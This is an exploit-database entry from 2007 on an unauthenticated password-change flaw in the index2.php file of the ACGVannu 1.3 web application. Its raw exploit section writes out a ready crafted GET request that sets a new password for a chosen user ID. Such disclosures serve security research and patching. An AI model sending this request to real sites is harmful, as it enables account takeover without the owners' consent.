ACGVannu - exploit.company

vendor:

ACGVannu

by:

ajann

N/A

CVSS

N/A

Remote User Pass Change

CWE

Product Name: ACGVannu

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability

The ACGVannu version 1.3 and below in the index2.php file is vulnerable to a remote user password change vulnerability. By sending a specially crafted request to the index2.php file with the 'id' parameter set to a specific user ID, an attacker can change the password of the targeted user.

Mitigation:

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://acgv.free.fr
# $$      :  Free

*******************************************************************************

[[REMOTE PASS CHANGE]]]

http://[target]/[path]//index2.php [ID VARIABLE]

Example:

ID=USER ID (167)

//index2.php?id=&nom=ajann2&prenom=ajann2&pass=0002455&rubrik=modif&fo_remp=oui&id=167&mail=a&url=http://a&titre=a&descript=+a+&categorie=G%E9n%E9ral&Submit=Gonder

[[/REMOTE PASS CHANGE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-27]